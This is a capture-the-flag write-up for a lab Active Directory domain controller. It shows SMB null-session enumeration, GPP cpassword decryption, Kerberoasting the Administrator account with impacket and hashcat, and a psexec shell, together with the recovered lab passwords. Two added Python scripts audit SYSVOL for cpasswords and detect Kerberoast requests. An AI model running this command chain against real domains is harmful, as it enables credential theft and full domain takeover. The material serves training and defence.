Active

Published: Feb 25, 2025

Enumeration

Scan

The following is a one-liner I came up with to scan HTB machines, which uses rustscan to quickly identify all open TCP ports and then does a detailed scan using nmap. The port list is captured with command substitution rather than by piping into read, because in bash the last command of a pipeline runs in a subshell and the variable would be empty by the time nmap runs.

TARGET=10.10.10.100; mkdir -p scans; PORTS=$(rustscan -r 1-65535 --scripts none -a $TARGET | tee scans/fast.rustscan | grep '\->' | awk -F'[' '{print $2}' | sed 's/]//'); nmap -sC -sV -oN scans/detailed.nmap -p $PORTS $TARGET

SMB

Let’s see if we can enumerate SMB without any valid credentials (null authentication)

nxc smb 10.10.10.100 -u '' -p '' --shares

We can read a share called “Replication”. Let’s use the spider_plus module to look for potentially interesting files

nxc smb 10.10.10.100 -u '' -p '' -m spider_plus

The output is in JSON format and is saved as /tmp/nxc_hosted/nxc_spider_plus/10.10.10.100.json

Let’s use jq for some nice output

jq . /tmp/nxc_hosted/nxc_spider_plus/10.10.10.100.json

One file that stands out to me is the Groups.xml file

Let’s download it to our local machine using smbclient while specifying null credentials (-U '%' sends an empty username and password); the file is then fetched with get from the smb: prompt

smbclient -U '%' //10.10.10.100/Replication

Foothold

Group Policy Preferences (GPP)

Taking a look at the file we downloaded: it is a Group Policy Preferences (GPP) file, which, according to the MSDN, is "a collection of Group Policy client-side extensions that deliver preference settings to domain-joined computers running Microsoft Windows desktop and server operating systems." The XML config file stores an account password in its cpassword attribute, encrypted with a static key that Microsoft itself has published, so anyone who can read the file can recover the password.

The cpassword can be decrypted using a tool called gpp-decrypt

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

The password for the svc_tgs account is GPPstillStandingStrong2k18
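From the defender's side, the same weakness is something to audit for: any Groups.xml (or other GPP XML) under SYSVOL that still carries a cpassword attribute is a stored credential readable by every domain user. The following script is an added example, not part of this write-up and not gpp-decrypt's code. It does not decrypt anything; it walks a SYSVOL-style tree, reports which account each cpassword sets, and checks that the ciphertext has the shape gpp-decrypt expects (base64 without padding, AES-block aligned). The Groups.xml layout is constructed and trimmed; the cpassword value is the one shown above, and the GPO directory name is a placeholder.

```python
"""Locate cpassword attributes in Group Policy Preference XML files.

Added example, not part of the original write-up and not gpp-decrypt's code.
The Groups.xml below is a constructed, trimmed layout; only the cpassword
value comes from the write-up.
"""
import base64
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List

# GPP files that may carry a cpassword attribute (Groups.xml is the usual one).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}

SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""


def fix_base64_padding(value: str) -> str:
    """GPP writes the base64 text without '=' padding; restore it before decoding."""
    return value + "=" * (-len(value) % 4)


def find_cpasswords(xml_text: str, source: str = "<string>") -> List[Dict[str, object]]:
    """Return one finding per element that carries a cpassword attribute."""
    findings: List[Dict[str, object]] = []
    for elem in ET.fromstring(xml_text).iter():
        cpassword = elem.attrib.get("cpassword")
        if not cpassword:
            continue
        raw = base64.b64decode(fix_base64_padding(cpassword))
        # The account differs per GPP file type: userName (Groups/Drives),
        # runAs (ScheduledTasks), accountName (Services).
        account = (elem.attrib.get("userName") or elem.attrib.get("runAs")
                   or elem.attrib.get("accountName") or "")
        findings.append({
            "file": source,
            "element": elem.tag,
            "account": account,
            "ciphertext_bytes": len(raw),
            # AES-CBC output is always a whole number of 16-byte blocks
            "aes_block_aligned": len(raw) % 16 == 0,
        })
    return findings


def audit_tree(root: Path) -> List[Dict[str, object]]:
    """Walk a SYSVOL-style directory tree and collect findings from GPP files."""
    findings: List[Dict[str, object]] = []
    for path in sorted(root.rglob("*.xml")):
        if path.name in GPP_FILES:
            findings.extend(find_cpasswords(path.read_text(encoding="utf-8-sig"), str(path)))
    return findings


def audit_sample_tree() -> List[Dict[str, object]]:
    """Write the constructed Groups.xml into a temporary tree and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        # Placeholder GPO GUID; real SYSVOL trees use the policy's actual GUID here.
        policy_dir = (Path(tmp) / "Policies" / "{PLACEHOLDER-GPO-GUID}"
                      / "MACHINE" / "Preferences" / "Groups")
        policy_dir.mkdir(parents=True)
        (policy_dir / "Groups.xml").write_text(SAMPLE_GROUPS_XML, encoding="utf-8")
        return audit_tree(Path(tmp))


if __name__ == "__main__":
    for finding in audit_sample_tree():
        print(f"{finding['file']}: <{finding['element']}> sets a password for "
              f"{finding['account']} ({finding['ciphertext_bytes']} bytes, "
              f"block aligned: {finding['aes_block_aligned']})")
```

Pointing audit_tree at a mounted SYSVOL share (or a copy of it) lists every policy that still ships a cpassword; the fix is to delete the preference item and rotate the account's password, since removing the file alone leaves the old value in backups and in the hands of anyone who already read it.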

SMB (Again)

Now that we have new credentials, let's enumerate SMB again

nxc smb 10.10.10.100 -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' --shares

We can now read a lot more shares, which includes the "Users" share
You can do some looking around, but there isn’t much other than the user.txt flag

Privilege Escalation

Bloodhound

From our enumeration, we know that we are attacking the Domain Controller for the domain active.htb
One tool I always run in Active Directory environments is Bloodhound, because it allows you to visualize the attack surface. The tool is not required to solve this machine, but it is what I used to find the next step. To set up Bloodhound on Kali, reference this documentation.

I will use bloodhound.py as my ingestor (GitHub)

python3 bloodhound.py -u 'svc_tgs' -p 'GPPstillStandingStrong2k18' -d active.htb -ns 10.10.10.100 -c all

After loading the data into Bloodhound and going through some of the "Analysis" queries, I was able to spot something unusual: the Administrator account is Kerberoastable.

Kerberoast

A user object can carry a Service Principal Name (SPN), which makes it act as a service account. When any authenticated user requests a Ticket Granting Service (TGS) ticket for that SPN, the KDC encrypts the ticket with a key derived from the service account's password. The Kerberoast attack consists of requesting such tickets and cracking the password offline, which is why an SPN on a privileged account with a weak password is a serious finding.

To get a crackable hash, use GetUserSPNs from impacket

impacket-GetUserSPNs active.htb/svc_tgs:'GPPstillStandingStrong2k18' -dc-ip 10.10.10.100 -request -outputfile administrator.hash

Let's try cracking it with hashcat and the rockyou.txt wordlist

hashcat -m 13100 administrator.hash /usr/share/wordlists/rockyou.txt

We now have the Administrator's password: Ticketmaster1968
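On the detection side, the request made above leaves a trace: the domain controller logs Security event 4769 for every service ticket, including the encryption type, and hashcat mode 13100 only works on RC4-HMAC (0x17) tickets. The script below is an added example, not from this write-up; it runs over constructed key=value renderings of 4769 events (Account Name is the requester, Service Name is the account that owns the SPN) and flags two things: an RC4 service ticket issued for a user account, and one requester collecting tickets for many distinct user-account services. The jdoe account and the svc_* service names are invented to exercise the second rule; a real pipeline would feed parsed EVTX or SIEM fields into the same function.

```python
"""Flag Kerberoast-style service-ticket requests in Windows Security event 4769.

Added example, not from the write-up. Event lines are constructed; a real
deployment would map EVTX/SIEM fields to the same keys.
"""
from collections import defaultdict
from typing import Dict, List, Set

RC4_HMAC = "0x17"      # etype 23; AES tickets show as 0x11 / 0x12
BULK_THRESHOLD = 3     # distinct user-account services per requester before alerting

# Constructed events. The first svc_tgs line mirrors the request in this
# write-up; jdoe and the svc_* services are invented to trigger the bulk rule.
SAMPLE_EVENTS = [
    "EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 Status=0x0 IpAddress=10.10.14.5",
    "EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.5",
    "EventID=4769 TargetUserName=DC$@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.10.100",
    "EventID=4768 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.5",
    "EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=svc_sql TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.9",
    "EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=svc_web TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.9",
    "EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=svc_backup TicketEncryptionType=0x12 Status=0x0 IpAddress=10.10.14.9",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split a 'key=value key=value' line into a dict."""
    return dict(field.split("=", 1) for field in line.split())


def is_user_service(service_name: str) -> bool:
    """Machine accounts end in '$' and krbtgt is the KDC itself; neither is a roast target."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def find_kerberoast(lines: List[str]) -> List[Dict[str, str]]:
    """Return alerts for RC4 user-service tickets and for bulk SPN harvesting."""
    alerts: List[Dict[str, str]] = []
    services_per_requester: Dict[str, Set[str]] = defaultdict(set)

    for line in lines:
        ev = parse_event(line)
        # Only successful service-ticket requests are interesting here.
        if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
            continue
        service = ev.get("ServiceName", "")
        if not is_user_service(service):
            continue
        requester = ev.get("TargetUserName", "")
        services_per_requester[requester].add(service)
        if ev.get("TicketEncryptionType") == RC4_HMAC:
            alerts.append({
                "rule": "rc4_service_ticket_for_user_account",
                "requester": requester,
                "service": service,
                "source_ip": ev.get("IpAddress", ""),
            })

    for requester, services in services_per_requester.items():
        if len(services) >= BULK_THRESHOLD:
            alerts.append({
                "rule": "bulk_spn_requests",
                "requester": requester,
                "service": ",".join(sorted(services)),
                "source_ip": "",
            })
    return alerts


if __name__ == "__main__":
    for alert in find_kerberoast(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] {alert['requester']} -> {alert['service']} {alert['source_ip']}")
```

The RC4 rule is low-noise in a domain whose service accounts support AES, because a tool asking for an RC4 ticket stands out; the bulk rule catches tooling that requests every SPN in one pass, which is what the GetUserSPNs -request run above does on a larger domain. Either alert should lead back to the SPN owner: a privileged account such as Administrator should not carry an SPN at all.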

Shell Access

With these administrative credentials, there are a number of ways to get shell access on the box
I will use psexec from impacket and retrieve the root.txt flag from the Administrator's desktop

impacket-psexec administrator:'Ticketmaster1968'@10.10.10.100